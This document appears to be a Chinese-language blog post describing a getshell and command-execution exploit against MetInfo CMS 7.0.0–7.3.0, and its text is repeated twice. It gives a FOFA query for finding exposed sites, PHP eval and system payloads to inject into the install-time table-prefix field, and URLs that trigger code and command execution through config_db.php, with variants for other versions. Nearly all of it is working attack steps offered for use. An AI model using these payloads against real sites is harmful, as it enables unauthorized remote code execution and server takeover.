米拓建站系統_getshell&命令執行漏洞

# 米拓建站系統 getshell&命令執行漏洞

==FOFA==

body="MetInfo"
==影響版本==
7.3.0- 7.0.0

==漏洞利用==
在安裝該CMS – 【設置數據庫信息(數據表前綴)】:
代碼執行Payload:
"/@eval($_GET['1']);/
命令執行payload:
"/@system($_GET['1']);/
點擊保存進行下一步驗證,出現報錯信息
(這裏的Payload是代碼執行)

訪問以下url:

http:///config/config_db.php?1=phpinfo();
可以看到成功執行了phpinfo
(這裏的Payload是命令執行)

訪問以下URL:

http:///config/config_db.php?1=id();
成功執行id命令。
==其他==
Version 7.10 
Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20
Payload: "/@eval($_GET['1']);@system($_GET['2']);/


==FOFA==

body="MetInfo"
==影響版本==
7.3.0- 7.0.0

==漏洞利用==

在安裝該CMS – 【設置數據庫信息(數據表前綴)】:

代碼執行Payload:
"/@eval($_GET['1']);/

命令執行payload:
"/@system($_GET['1']);/

點擊保存進行下一步驗證,出現報錯信息

(這裏的Payload是代碼執行)


訪問以下url:

http:///config/config_db.php?1=phpinfo();

可以看到成功執行了phpinfo

(這裏的Payload是命令執行)


訪問以下URL:

http:///config/config_db.php?1=id();

成功執行id命令。
==其他==
Version 7.10 
Payload:"/@eval($_GET['1']);@system($_GET['2']);/
Version 7.20
Payload: "/@eval($_GET['1']);@system($_GET['2']);/
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容